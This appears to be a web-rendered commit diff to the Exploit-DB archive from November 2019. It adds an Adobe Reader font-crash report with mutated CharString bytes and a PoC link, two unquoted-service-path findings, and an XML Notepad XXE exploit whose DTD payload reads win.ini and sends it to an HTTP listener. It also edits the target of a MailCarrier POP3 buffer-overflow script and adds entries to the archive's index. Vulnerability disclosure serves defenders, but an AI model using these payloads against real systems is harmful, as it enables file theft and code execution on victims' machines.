32 047feea0 745d8503 5fc566d0 00000000 0000000f USER32!UserCallWinProcCheckWow+0x1be
|
||||
33 047fef08 745d8aa0 13ff4e80 00000000 0000000f USER32!DispatchClientMessage+0x1b3
|
||||
34 047fef50 77371a6d 047fef6c 00000020 047fefcc USER32!__fnDWORD+0x50
|
||||
35 047fef88 745d91ee 047ff01c e165025c 18170dd8 ntdll!KiUserCallbackDispatcher+0x4d
|
||||
36 047fefdc 745d8c20 e51aed80 047ff000 5fc6da6d USER32!DispatchMessageWorker+0x5be
|
||||
37 047fefe8 5fc6da6d 047ff01c 18170dd8 18170dd8 USER32!DispatchMessageW+0x10
|
||||
38 047ff000 5fc6d89e 047ff01c dd9e095c 18170dd8 AcroRd32!DllCanUnloadNow+0x24b0d
|
||||
39 047ff074 5fc6d744 dd9e0984 18170dd8 00000000 AcroRd32!DllCanUnloadNow+0x2493e
|
||||
3a 047ff0ac 5fbfc575 dd9e0834 16d7eff8 00000000 AcroRd32!DllCanUnloadNow+0x247e4
|
||||
3b 047ff11c 5fbfbf81 5fbd0000 00110000 16d7eff8 AcroRd32!AcroWinMainSandbox+0x775
|
||||
3c 047ff53c 0011783d 5fbd0000 00110000 16d7eff8 AcroRd32!AcroWinMainSandbox+0x181
|
||||
3d 047ff908 002201aa 00110000 00000000 0b61b3f2 AcroRd32_exe+0x783d
|
||||
3e 047ff954 76698674 0480b000 76698650 5ab919ba AcroRd32_exe!AcroRd32IsBrokerProcess+0x992da
|
||||
3f 047ff968 77365e17 0480b000 666934db 00000000 KERNEL32!BaseThreadInitThunk+0x24
|
||||
40 047ff9b0 77365de7 ffffffff 7738ad9b 00000000 ntdll!__RtlUserThreadStart+0x2f
|
||||
41 047ff9c0 00000000 00111390 0480b000 00000000 ntdll!_RtlUserThreadStart+0x1b
|
||||
--- cut ---
|
||||
|
||||
Notes:
|
||||
|
||||
- Reproduces on Adobe Acrobat Reader DC (2019.012.20036) on Windows 10, with and without PageHeap enabled, but most consistently with PageHeap (thanks to the allocation marker bytes).
|
||||
|
||||
- The crash occurs immediately after opening the PDF document, and is caused by dereferencing an uninitialized pointer from the heap. With PageHeap enabled, all new allocations are filled with the 0xc0c0c0... marker, which is visible in the crash log above.
|
||||
|
||||
- Attached samples: poc.pdf (crashing file), original.pdf (original file).
|
||||
|
||||
- We have minimized the difference between the original and mutated files down to three bytes at offsets 0x71a4, 0x71a5 and 0x71ba. They were changed from 0x1C, 0x14, 0x89 to 0xFF, 0xFF, 0x0E. When we analyzed it further, we determined that these bytes reside inside the "CFF " table of the embedded OpenType font. After extracting the font and decompiling it with the ttx tool from FontTools, we found that the difference is in the CharString of the "afii10091" glyph.
|
||||
|
||||
Original code:
|
||||
|
||||
--- cut ---
|
||||
[...]
|
||||
cntrmask 00011100
|
||||
cntrmask 00000110
|
||||
32 hmoveto
|
||||
660 hlineto
|
||||
120 0 32 -22 15 -146 rrcurveto
|
||||
28 0 -13 203 -2 0 rlineto
|
||||
[...]
|
||||
--- cut ---
|
||||
|
||||
Mutated code:
|
||||
|
||||
--- cut ---
|
||||
[...]
|
||||
cntrmask 11111111
|
||||
1707.08974 -99 hlineto
|
||||
120 0 32 -22 15 -146 rrcurveto
|
||||
28 0 -13 203 endchar
|
||||
0 rlineto
|
||||
[...]
|
||||
--- cut ---
|
||||
|
||||
|
||||
Proof of Concept:
|
||||
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47610.zip
|
31
exploits/windows/local/47604.txt
Normal file
31
exploits/windows/local/47604.txt
Normal file
|
@ -0,0 +1,31 @@
|
|||
# Exploit Title: _GCafé 3.0 - 'gbClienService' Unquoted Service Path
|
||||
# Google Dork: N/A
|
||||
# Date: 2019-11-09
|
||||
# Exploit Author: Doan Nguyen (4ll4u)
|
||||
# Vendor Homepage: https://gcafe.vn/
|
||||
# Software Link: https://gcafe.vn/post/view?slug=gcafe-3.0
|
||||
# Version: v3.0
|
||||
# Tested on: Windows 7, Win 10, WinXP
|
||||
# CVE : N/A
|
||||
# Description:
|
||||
# GCafé 3.0 - Internet Cafe is a software that supports the management of public Internet access points
|
||||
|
||||
# PoC:
|
||||
|
||||
# wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
|
||||
gbClientService gbClientService C:\Program Files\GBillingClient\gbClientService.exe Auto
|
||||
#C:\>sc qc gbClientService
|
||||
[SC] QueryServiceConfig SUCCESS
|
||||
|
||||
SERVICE_NAME: gbClientService
|
||||
TYPE : 10 WIN32_OWN_PROCESS
|
||||
START_TYPE : 2 AUTO_START
|
||||
ERROR_CONTROL : 1 NORMAL
|
||||
BINARY_PATH_NAME : C:\Program Files\GBillingClient\gbClientService.exe
|
||||
LOAD_ORDER_GROUP : GarenaGroup
|
||||
TAG : 0
|
||||
DISPLAY_NAME : gbClientService
|
||||
DEPENDENCIES :
|
||||
SERVICE_START_NAME : LocalSystem
|
||||
|
||||
C:\>
|
29
exploits/windows/local/47605.txt
Normal file
29
exploits/windows/local/47605.txt
Normal file
|
@ -0,0 +1,29 @@
|
|||
# Exploit Title: Alps HID Monitor Service 8.1.0.10 - 'ApHidMonitorService' Unquote Service Path
|
||||
# Date: 2019-11-07
|
||||
# Exploit Author: Héctor Gabriel Chimecatl Hernández
|
||||
# Vendor Homepage: https://www.alps.com/e/
|
||||
# Software Link: https://www.alps.com/e/
|
||||
# Version: 8.1.0.10
|
||||
# Tested on: Windows 10 Home Single Language x64 Esp
|
||||
|
||||
# Step to discover the unquoted Service:
|
||||
|
||||
C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
|
||||
|
||||
# Service info:
|
||||
|
||||
Alps HID Monitor Service ApHidMonitorService C:\Program Files\Apoint2K\HidMonitorSvc.exe Auto
|
||||
|
||||
C:\Users\user>sc qc ApHidMonitorService
|
||||
[SC] QueryServiceConfig CORRECTO
|
||||
|
||||
NOMBRE_SERVICIO: ApHidMonitorService
|
||||
TIPO : 10 WIN32_OWN_PROCESS
|
||||
TIPO_INICIO : 2 AUTO_START
|
||||
CONTROL_ERROR : 1 NORMAL
|
||||
NOMBRE_RUTA_BINARIO: C:\Program Files\Apoint2K\HidMonitorSvc.exe
|
||||
GRUPO_ORDEN_CARGA :
|
||||
ETIQUETA : 0
|
||||
NOMBRE_MOSTRAR : Alps HID Monitor Service
|
||||
DEPENDENCIAS :
|
||||
NOMBRE_INICIO_SERVICIO: LocalSystem
|
|
@ -56,7 +56,7 @@ buffer = '\x41' * 5095 + jmpesp + '\x90' * 20 + buf + '\x43' * (5096 - 4 - 20 -
|
|||
|
||||
print "[*] MailCarrier 2.51 POP3 Buffer Overflow in USER command\r\n"
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
connect=s.connect(("192.168.121.87", 110))
|
||||
connect=s.connect(("TARGET", 110))
|
||||
print s.recv(1024)
|
||||
s.send('USER ' + buffer + '\r\n')
|
||||
print s.recv(1024)
|
||||
|
|
29
exploits/xml/local/47606.txt
Normal file
29
exploits/xml/local/47606.txt
Normal file
|
@ -0,0 +1,29 @@
|
|||
# Exploit Title: XML Notepad 2.8.0.4 - XML External Entity Injection
|
||||
# Date: 2019-11-11
|
||||
# Exploit Author: 8-Team / daejinoh
|
||||
# Vendor Homepage: https://www.microsoft.com/
|
||||
# Software Link: https://github.com/microsoft/XmlNotepad
|
||||
# Version: XML Notepad 2.8.0.4
|
||||
# Tested on: Windows 10 Pro
|
||||
# CVE : N/A
|
||||
|
||||
# Step
|
||||
1) File -> Open -> *.xml
|
||||
|
||||
# Exploit Code
|
||||
|
||||
1) Server(python 3.7) : python -m http.server
|
||||
2) Poc.xml :
|
||||
<?xml version="1.0"?>
|
||||
<!DOCTYPE test [
|
||||
<!ENTITY % file SYSTEM "C:\Windows\win.ini">
|
||||
<!ENTITY % dtd SYSTEM "http://127.0.0.1:8000/payload.dtd">
|
||||
%dtd;]>
|
||||
<pwn>&send;</pwn>
|
||||
|
||||
3) payload.dtd
|
||||
<?xml version="1.0" encoding="UTF-8"?>
|
||||
<!ENTITY % all "<!ENTITY send SYSTEM 'http://127.0.0.1:8000?%file;'>">
|
||||
%all;
|
||||
|
||||
--------------------------------------------------------------------------------
|
|
@ -6589,6 +6589,10 @@ id,file,description,date,author,type,platform,port
|
|||
47590,exploits/multiple/dos/47590.txt,"JavaScriptCore - Type Confusion During Bailout when Reconstructing Arguments Objects",2019-11-05,"Google Security Research",dos,multiple,
|
||||
47591,exploits/multiple/dos/47591.txt,"WebKit - Universal XSS in JSObject::putInlineSlow and JSValue::putToPrimitive",2019-11-05,"Google Security Research",dos,multiple,
|
||||
47592,exploits/macos/dos/47592.txt,"macOS XNU - Missing Locking in checkdirs_callback() Enables Race with fchdir_common()",2019-11-05,"Google Security Research",dos,macos,
|
||||
47607,exploits/ios/dos/47607.c,"iOS IOUSBDeviceFamily 12.4.1 - 'IOInterruptEventSource' Heap Corruption (PoC)",2019-11-11,"Sem Voigtlander",dos,ios,
|
||||
47608,exploits/multiple/dos/47608.txt,"iMessage - Decoding NSSharedKeyDictionary can read ObjC Object at Attacker Controlled Address",2019-11-11,"Google Security Research",dos,multiple,
|
||||
47609,exploits/windows/dos/47609.txt,"Adobe Acrobat Reader DC for Windows - Use of Uninitialized Pointer due to Malformed JBIG2Globals Stream",2019-11-11,"Google Security Research",dos,windows,
|
||||
47610,exploits/windows/dos/47610.txt,"Adobe Acrobat Reader DC for Windows - Use of Uninitialized Pointer due to Malformed OTF Font (CFF Table)",2019-11-11,"Google Security Research",dos,windows,
|
||||
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
|
||||
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
|
||||
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
|
||||
|
@ -10757,6 +10761,9 @@ id,file,description,date,author,type,platform,port
|
|||
47597,exploits/windows/local/47597.txt,"Adaware Web Companion version 4.8.2078.3950 - 'WCAssistantService' Unquoted Service Path",2019-11-07,"Mariela L Martínez Hdez",local,windows,
|
||||
47599,exploits/windows/local/47599.txt,"SolarWinds Kiwi Syslog Server 8.3.52 - 'Kiwi Syslog Server' Unquoted Service Path",2019-11-08,"Carlos A Garcia R",local,windows,
|
||||
47601,exploits/android/local/47601.rb,"Android Janus - APK Signature Bypass (Metasploit)",2019-11-08,Metasploit,local,android,
|
||||
47604,exploits/windows/local/47604.txt,"_GCafé 3.0 - 'gbClienService' Unquoted Service Path",2019-11-11,4ll4u,local,windows,
|
||||
47605,exploits/windows/local/47605.txt,"Alps HID Monitor Service 8.1.0.10 - 'ApHidMonitorService' Unquote Service Path",2019-11-11,"Héctor Gabriel Chimecatl Hernández",local,windows,
|
||||
47606,exploits/xml/local/47606.txt,"XML Notepad 2.8.0.4 - XML External Entity Injection",2019-11-11,daejinoh,local,xml,
|
||||
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
|
||||
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
|
||||
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
|
||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue